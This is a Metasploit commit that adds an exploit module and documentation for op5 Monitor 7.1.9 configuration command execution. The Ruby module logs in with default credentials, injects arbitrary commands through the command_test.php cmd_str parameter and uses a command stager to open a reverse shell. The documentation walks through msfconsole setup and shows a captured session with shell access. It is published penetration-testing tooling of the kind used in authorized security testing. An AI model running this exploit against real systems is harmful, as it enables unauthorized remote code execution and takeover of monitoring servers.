Land rapid7#6934, Adds exploit for op5 configuration command execution

bwatters-r7 · bwatters-r7 · commit 9ea0b8f944e4 · 2016-06-16T14:36:10.000-05:00
diff --git a/documentation/modules/exploit/linux/http/op5_config_exec.md b/documentation/modules/exploit/linux/http/op5_config_exec.md
@@ -0,0 +1,63 @@
+## Vulnerable Application
+
+  Official Source: [op5.com](https://www.op5.com/blog/wpfb-file/op5-monitor-7-1-9-20160303-tar-gz/)
+  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
+
+### Creating A Testing Environment
+
+Just a few quick notes on setting up a vulnerable lab with this software.
+
+  1. The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
+  2. Within `php.ini`, `date.timezone = "America/New York"` to `date.timezone = "America/New_York"` if you get php errors
+  3. You may need to register for a free license via an email challenge/verification
+
+## Verification Steps
+
+  1. Install the software, RHEL/CENTOS required (tested on CentOS 6)
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/op5_config_exec```
+  4. Do: ```set payload linux/x86/shell/reverse_tcp```
+  5. Do: ```set rhost 192.168.2.31```
+  6. Do: ```set lhost 192.168.2.229```
+  7. Do: ```exploit```
+  8. You should get a shell.
+
+## Options
+
+  **PASSWORD**
+
+  Password is 'monitor' by default.
+
+  **USERNAME**
+
+  Documentation was unclear on this.  Installing just the app, the
+  username was 'monitor' by default.  However it looks like if you
+  install the appliance it may be 'root'
+
+## Scenarios
+
+  ```
+    msf > use exploit/linux/http/op5_config_exec 
+    msf exploit(op5_config_exec) > set verbose true
+    verbose => true
+    msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp
+    payload => linux/x86/shell/reverse_tcp
+    msf exploit(op5_config_exec) > set rhost 192.168.2.31
+    rhost => 192.168.2.31
+    msf exploit(op5_config_exec) > set lhost 192.168.2.229
+    lhost => 192.168.2.229
+    msf exploit(op5_config_exec) > check
+    
+    [+] Version Detected: 7.1.9
+    [+] The target is vulnerable.
+    msf exploit(op5_config_exec) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.229:4444 
+    [*] Sending stage (36 bytes) to 192.168.2.31
+    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400
+    [*] Command Stager progress - 100.00% done (832/832 bytes)
+    whoami
+    monitor
+    id
+    uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0
+  ```
diff --git a/modules/exploits/linux/http/op5_config_exec.rb b/modules/exploits/linux/http/op5_config_exec.rb
@@ -0,0 +1,132 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'op5 v7.1.9 Configuration Command Execution',
+        'Description' => %q(
+          op5 an open source network monitoring software.
+          The configuration page in version 7.1.9 and below
+          allows the ability to test a system command, which
+          can be abused to run arbitrary code as an unpriv user.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@shorebreaksecurity.com>', # module
+            'hyp3rlinx'                        # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39676' ],
+            [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['linux', 'unix'],
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Apr 08 2016'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
+        OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path),
+        'method'    => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      /Version: (?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+\|/ =~ res.body
+
+      if version && Gem::Version.new(version) <= Gem::Version.new('7.1.9')
+        vprint_good("Version Detected: #{version}")
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    execute_cmdstager(
+      :flavor  => :echo
+    )
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      # To manually view the vuln page, click Manage > Configure > Commands.
+      # Click the "Test this command" button to display the form we abuse.
+
+      # login
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),
+        'method'    => 'POST',
+        'vars_get'  =>
+        {
+          'uri' => 'tac/index'
+        },
+        'vars_post' =>
+        {
+          'csrf_token' => '',
+          'username'   => datastore['USERNAME'],
+          'password'   => datastore['PASSWORD']
+        }
+      )
+
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
+      cookie = res.get_cookies
+      # exploit
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),
+        'method'    => 'GET',
+        'cookie'    => cookie,
+        'vars_get'  =>
+        {
+          'cmd_str' => cmd
+        }
+      )
+
+      # success means we hang our session, and wont get back a response
+      if res
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+        fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/
+      end
+
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def on_new_session(session)
+    super
+    session.shell_command_token('setsid $SHELL')
+  end
+end
